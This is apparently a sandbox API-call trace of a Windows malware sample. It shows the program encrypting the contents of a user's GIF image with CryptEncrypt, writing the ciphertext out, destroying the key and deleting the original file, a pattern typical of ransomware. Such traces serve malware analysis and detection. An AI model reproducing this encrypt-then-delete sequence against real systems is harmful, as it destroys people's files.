PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0211.618] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0211.618] CharLowerBuffW (in: lpsz="byte[15912]", cchLength=0xb | out: lpsz="byte[15912]") returned 0xb [0211.618] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0211.619] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0211.619] CharUpperBuffW (in: lpsz="A4F00A00447", cchLength=0xb | out: lpsz="A4F00A00447") returned 0xb [0211.619] PeekMessageW (in: lpMsg=0x8cef58, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cef58) returned 0 [0211.619] CharUpperBuffW (in: lpsz="SSA4F00A00447", cchLength=0xd | out: lpsz="SSA4F00A00447") returned 0xd [0211.619] PeekMessageW (in: lpMsg=0x8cef58, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cef58) returned 0 [0211.619] PeekMessageW (in: lpMsg=0x8cef58, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cef58) returned 0 [0211.619] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0211.619] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptEncrypt", cchWideChar=13, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 13 [0211.619] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptEncrypt", cchWideChar=13, lpMultiByteStr=0x2aab428, cbMultiByte=13, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="CryptEncrypt", lpUsedDefaultChar=0x0) returned 13 [0211.619] CryptEncrypt (in: hKey=0x9e2078, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x2a8e768*, pdwDataLen=0x8cef60*=0x3e21, dwBufLen=0x3e28 | out: pbData=0x2a8e768*, pdwDataLen=0x8cef60*=0x3e28) returned 1 [0211.668] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0211.668] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0211.668] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0211.668] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0211.670] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0211.670] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0211.670] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0211.670] CharUpperBuffW (in: lpsz="A170020032E", cchLength=0xb | out: lpsz="A170020032E") returned 0xb [0211.670] PeekMessageW (in: lpMsg=0x8cf158, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf158) returned 0 [0211.670] CharUpperBuffW (in: lpsz="SSA170020032E", cchLength=0xd | out: lpsz="SSA170020032E") returned 0xd [0211.670] PeekMessageW (in: lpMsg=0x8cf158, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf158) returned 0 [0211.670] PeekMessageW (in: lpMsg=0x8cf158, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf158) returned 0 [0211.671] CharUpperBuffW (in: lpsz="A0000901A0E", cchLength=0xb | out: lpsz="A0000901A0E") returned 0xb [0211.671] PeekMessageW (in: lpMsg=0x8ceef8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8ceef8) returned 0 [0211.671] CharUpperBuffW (in: lpsz="SSA0000901A0E", cchLength=0xd | out: lpsz="SSA0000901A0E") returned 0xd [0211.671] PeekMessageW (in: lpMsg=0x8ceef8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8ceef8) returned 0 [0211.671] PeekMessageW (in: lpMsg=0x8ceef8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8ceef8) returned 0 [0211.671] PeekMessageW (in: lpMsg=0x8ceef8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8ceef8) returned 0 [0211.671] PeekMessageW (in: lpMsg=0x8cf158, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf158) returned 0 [0211.671] CharUpperBuffW (in: lpsz="A1A0070620F", cchLength=0xb | out: lpsz="A1A0070620F") returned 0xb [0211.671] PeekMessageW (in: lpMsg=0x8ced58, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8ced58) returned 0 [0211.671] CharUpperBuffW (in: lpsz="SSA1A0070620F", cchLength=0xd | out: lpsz="SSA1A0070620F") returned 0xd [0211.671] PeekMessageW (in: lpMsg=0x8ced58, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8ced58) returned 0 [0211.671] PeekMessageW (in: lpMsg=0x8ced58, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8ced58) returned 0 [0211.671] PeekMessageW (in: lpMsg=0x8cf158, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf158) returned 0 [0211.671] PeekMessageW (in: lpMsg=0x8cf158, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf158) returned 0 [0211.671] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0211.673] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0211.673] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0211.673] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0211.673] WriteFile (in: hFile=0x504, lpBuffer=0x2aa1e58*, nNumberOfBytesToWrite=0x3e28, lpNumberOfBytesWritten=0x8cf5e4, lpOverlapped=0x0 | out: lpBuffer=0x2aa1e58*, lpNumberOfBytesWritten=0x8cf5e4*=0x3e28, lpOverlapped=0x0) returned 1 [0211.674] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0211.674] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0211.674] CharUpperBuffW (in: lpsz="A4D00401A22", cchLength=0xb | out: lpsz="A4D00401A22") returned 0xb [0211.674] PeekMessageW (in: lpMsg=0x8cf3a0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3a0) returned 0 [0211.674] CharUpperBuffW (in: lpsz="SSA4D00401A22", cchLength=0xd | out: lpsz="SSA4D00401A22") returned 0xd [0211.674] PeekMessageW (in: lpMsg=0x8cf3a0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3a0) returned 0 [0211.674] PeekMessageW (in: lpMsg=0x8cf3a0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3a0) returned 0 [0211.674] CharUpperBuffW (in: lpsz="A4F00A00447", cchLength=0xb | out: lpsz="A4F00A00447") returned 0xb [0211.675] PeekMessageW (in: lpMsg=0x8cedb0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cedb0) returned 0 [0211.675] CharUpperBuffW (in: lpsz="SSA4F00A00447", cchLength=0xd | out: lpsz="SSA4F00A00447") returned 0xd [0211.675] PeekMessageW (in: lpMsg=0x8cedb0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cedb0) returned 0 [0211.675] PeekMessageW (in: lpMsg=0x8cedb0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cedb0) returned 0 [0211.675] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0211.675] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptDestroyKey", cchWideChar=16, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 16 [0211.675] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptDestroyKey", cchWideChar=16, lpMultiByteStr=0x2aab0f8, cbMultiByte=16, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="CryptDestroyKey", lpUsedDefaultChar=0x0) returned 16 [0211.675] CryptDestroyKey (hKey=0x9e2078) returned 1 [0211.675] PeekMessageW (in: lpMsg=0x8cf3a0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3a0) returned 0 [0211.675] PeekMessageW (in: lpMsg=0x8cf3a0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3a0) returned 0 [0211.675] CharUpperBuffW (in: lpsz="A170020032E", cchLength=0xb | out: lpsz="A170020032E") returned 0xb [0211.675] PeekMessageW (in: lpMsg=0x8cf140, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf140) returned 0 [0211.675] CharUpperBuffW (in: lpsz="SSA170020032E", cchLength=0xd | out: lpsz="SSA170020032E") returned 0xd [0211.675] PeekMessageW (in: lpMsg=0x8cf140, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf140) returned 0 [0211.675] PeekMessageW (in: lpMsg=0x8cf140, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf140) returned 0 [0211.675] CharUpperBuffW (in: lpsz="A0000901A0E", cchLength=0xb | out: lpsz="A0000901A0E") returned 0xb [0211.675] PeekMessageW (in: lpMsg=0x8ceee0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8ceee0) returned 0 [0211.675] CharUpperBuffW (in: lpsz="SSA0000901A0E", cchLength=0xd | out: lpsz="SSA0000901A0E") returned 0xd [0211.675] PeekMessageW (in: lpMsg=0x8ceee0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8ceee0) returned 0 [0211.675] PeekMessageW (in: lpMsg=0x8ceee0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8ceee0) returned 0 [0211.675] PeekMessageW (in: lpMsg=0x8ceee0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8ceee0) returned 0 [0211.676] PeekMessageW (in: lpMsg=0x8cf140, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf140) returned 0 [0211.676] CharUpperBuffW (in: lpsz="A1A0070620F", cchLength=0xb | out: lpsz="A1A0070620F") returned 0xb [0211.676] PeekMessageW (in: lpMsg=0x8ced40, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8ced40) returned 0 [0211.676] CharUpperBuffW (in: lpsz="SSA1A0070620F", cchLength=0xd | out: lpsz="SSA1A0070620F") returned 0xd [0211.676] PeekMessageW (in: lpMsg=0x8ced40, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8ced40) returned 0 [0211.676] PeekMessageW (in: lpMsg=0x8ced40, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8ced40) returned 0 [0211.676] PeekMessageW (in: lpMsg=0x8cf140, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf140) returned 0 [0211.676] PeekMessageW (in: lpMsg=0x8cf140, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf140) returned 0 [0211.676] PeekMessageW (in: lpMsg=0x8cf3a0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3a0) returned 0 [0211.676] PeekMessageW (in: lpMsg=0x8cf3a0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3a0) returned 0 [0211.676] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0211.676] CharUpperBuffW (in: lpsz="A170020032E", cchLength=0xb | out: lpsz="A170020032E") returned 0xb [0211.676] PeekMessageW (in: lpMsg=0x8cf4a8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf4a8) returned 0 [0211.676] CharUpperBuffW (in: lpsz="SSA170020032E", cchLength=0xd | out: lpsz="SSA170020032E") returned 0xd [0211.676] PeekMessageW (in: lpMsg=0x8cf4a8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf4a8) returned 0 [0211.676] PeekMessageW (in: lpMsg=0x8cf4a8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf4a8) returned 0 [0211.676] CharUpperBuffW (in: lpsz="A0000901A0E", cchLength=0xb | out: lpsz="A0000901A0E") returned 0xb [0211.676] PeekMessageW (in: lpMsg=0x8cf248, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf248) returned 0 [0211.676] CharUpperBuffW (in: lpsz="SSA0000901A0E", cchLength=0xd | out: lpsz="SSA0000901A0E") returned 0xd [0211.676] PeekMessageW (in: lpMsg=0x8cf248, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf248) returned 0 [0211.676] PeekMessageW (in: lpMsg=0x8cf248, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf248) returned 0 [0211.676] PeekMessageW (in: lpMsg=0x8cf248, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf248) returned 0 [0211.676] PeekMessageW (in: lpMsg=0x8cf4a8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf4a8) returned 0 [0211.677] CharUpperBuffW (in: lpsz="A1A0070620F", cchLength=0xb | out: lpsz="A1A0070620F") returned 0xb [0211.677] PeekMessageW (in: lpMsg=0x8cf0a8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf0a8) returned 0 [0211.677] CharUpperBuffW (in: lpsz="SSA1A0070620F", cchLength=0xd | out: lpsz="SSA1A0070620F") returned 0xd [0211.677] PeekMessageW (in: lpMsg=0x8cf0a8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf0a8) returned 0 [0211.677] PeekMessageW (in: lpMsg=0x8cf0a8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf0a8) returned 0 [0211.677] PeekMessageW (in: lpMsg=0x8cf4a8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf4a8) returned 0 [0211.677] CharUpperBuffW (in: lpsz="A4F00A00447", cchLength=0xb | out: lpsz="A4F00A00447") returned 0xb [0211.677] PeekMessageW (in: lpMsg=0x8cf138, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf138) returned 0 [0211.677] CharUpperBuffW (in: lpsz="SSA4F00A00447", cchLength=0xd | out: lpsz="SSA4F00A00447") returned 0xd [0211.677] PeekMessageW (in: lpMsg=0x8cf138, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf138) returned 0 [0211.677] PeekMessageW (in: lpMsg=0x8cf138, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf138) returned 0 [0211.677] CharUpperBuffW (in: lpsz="A2300C04232", cchLength=0xb | out: lpsz="A2300C04232") returned 0xb [0211.677] PeekMessageW (in: lpMsg=0x8cf138, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf138) returned 0 [0211.677] CharUpperBuffW (in: lpsz="SSA2300C04232", cchLength=0xd | out: lpsz="SSA2300C04232") returned 0xd [0211.677] PeekMessageW (in: lpMsg=0x8cf138, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf138) returned 0 [0211.677] PeekMessageW (in: lpMsg=0x8cf138, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf138) returned 0 [0211.677] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0211.677] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptReleaseContext", cchWideChar=20, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 20 [0211.677] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptReleaseContext", cchWideChar=20, lpMultiByteStr=0x29f7020, cbMultiByte=20, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="CryptReleaseContext", lpUsedDefaultChar=0x0) returned 20 [0211.677] CryptReleaseContext (hProv=0xa7c2a8, dwFlags=0x0) returned 1 [0211.677] PeekMessageW (in: lpMsg=0x8cf4a8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf4a8) returned 0 [0211.678] CharUpperBuffW (in: lpsz="A4F00A00447", cchLength=0xb | out: lpsz="A4F00A00447") returned 0xb [0211.678] PeekMessageW (in: lpMsg=0x8cf138, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf138) returned 0 [0211.678] CharUpperBuffW (in: lpsz="SSA4F00A00447", cchLength=0xd | out: lpsz="SSA4F00A00447") returned 0xd [0211.678] PeekMessageW (in: lpMsg=0x8cf138, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf138) returned 0 [0211.678] PeekMessageW (in: lpMsg=0x8cf138, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf138) returned 0 [0211.678] FreeLibrary (hLibModule=0x76390000) returned 1 [0211.678] PeekMessageW (in: lpMsg=0x8cf4a8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf4a8) returned 0 [0211.678] PeekMessageW (in: lpMsg=0x8cf4a8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf4a8) returned 0 [0211.678] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0211.678] CloseHandle (hObject=0x4f4) returned 1 [0211.679] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0211.679] CloseHandle (hObject=0x504) returned 1 [0211.680] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0211.681] PeekMessageW (in: lpMsg=0x8cf968, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf968) returned 0 [0211.681] CharUpperBuffW (in: lpsz="UserProfileDir", cchLength=0xe | out: lpsz="USERPROFILEDIR") returned 0xe [0211.681] GetEnvironmentVariableW (in: lpName="USERPROFILE", lpBuffer=0x8cf438, nSize=0x104 | out: lpBuffer="C:\\Users\\FD1HVy") returned 0xf [0211.681] GetFullPathNameW (in: lpFileName="C:\\Users\\FD1HVy\\Pictures/ul6W7nkKmk8Vcoms6H.gif", nBufferLength=0x104, lpBuffer=0x8cee18, lpFilePart=0x8cedf4 | out: lpBuffer="C:\\Users\\FD1HVy\\Pictures\\ul6W7nkKmk8Vcoms6H.gif", lpFilePart=0x8cedf4*="ul6W7nkKmk8Vcoms6H.gif") returned 0x2f [0211.681] GetFileAttributesW (lpFileName="C:\\Users\\FD1HVy\\Pictures\\ul6W7nkKmk8Vcoms6H.gif" (normalized: "c:\\users\\fd1hvy\\pictures\\ul6w7nkkmk8vcoms6h.gif")) returned 0x20 [0211.681] FindFirstFileW (in: lpFileName="C:\\Users\\FD1HVy\\Pictures\\ul6W7nkKmk8Vcoms6H.gif", lpFindFileData=0x8cf028 | out: lpFindFileData=0x8cf028*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x38cc4060, ftCreationTime.dwHighDateTime=0x1d5cdf1, ftLastAccessTime.dwLowDateTime=0x37eac020, ftLastAccessTime.dwHighDateTime=0x1d5c9b6, ftLastWriteTime.dwLowDateTime=0x37eac020, ftLastWriteTime.dwHighDateTime=0x1d5c9b6, nFileSizeHigh=0x0, nFileSizeLow=0x3e21, dwReserved0=0x2af0000, dwReserved1=0x8cf0e8, cFileName="ul6W7nkKmk8Vcoms6H.gif", cAlternateFileName="UL6W7N~1.GIF")) returned 0x9e1cb8 [0211.681] DeleteFileW (lpFileName="C:\\Users\\FD1HVy\\Pictures\\ul6W7nkKmk8Vcoms6H.gif" (normalized: "c:\\users\\fd1hvy\\pictures\\ul6w7nkkmk8vcoms6h.gif")) returned 1 [0211.685] FindNextFileW (in: hFindFile=0x9e1cb8, lpFindFileData=0x8cf028 | out: lpFindFileData=0x8cf028*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x38cc4060, ftCreationTime.dwHighDateTime=0x1d5cdf1, ftLastAccessTime.dwLowDateTime=0x37eac020, ftLastAccessTime.dwHighDateTime=0x1d5c9b6, ftLastWriteTime.dwLowDateTime=0x37eac020, ftLastWriteTime.dwHighDateTime=0x1d5c9b6, nFileSizeHigh=0x0, nFileSizeLow=0x3e21, dwReserved0=0x2af0000, dwReserved1=0x8cf0e8, cFileName="ul6W7nkKmk8Vcoms6H.gif", cAlternateFileName="UL6W7N~1.GIF")) returned 0 [0211.685] FindClose (in: hFindFile=0x9e1cb8 | out: hFindFile=0x9e1cb8) returned 1 [0211.685] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x29f3ee0 | out: hHeap=0x2af0000) returned 1 [0211.685] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71af8 | out: hHeap=0x2af0000) returned 1 [0211.685] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa750 | out: hHeap=0x2af0000) returned 1 [0211.685] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa708 | out: hHeap=0x2af0000) returned 1 [0211.685] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa6c0 | out: hHeap=0x2af0000) returned 1 [0211.685] PeekMessageW (in: lpMsg=0x8cf968, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf968) returned 0 [0211.685] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa540 [0211.685] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa558 [0211.685] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a719d8 [0211.685] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa828 [0211.685] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa5e8 [0211.685] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a71b78 [0211.685] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa588 [0211.685] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71b78 | out: hHeap=0x2af0000) returned 1 [0211.685] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0xca) returned 0x2a7a350 [0211.685] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a71b48 [0211.686] CharUpperBuffW (in: lpsz="UserProfileDir", cchLength=0xe | out: lpsz="USERPROFILEDIR") returned 0xe [0211.686] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa708 [0211.686] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa5d0 [0211.686] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0xc) returned 0x2aaa768 [0211.686] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa6a8 [0211.686] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa708 | out: hHeap=0x2af0000) returned 1 [0211.686] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0xc) returned 0x2aaa708 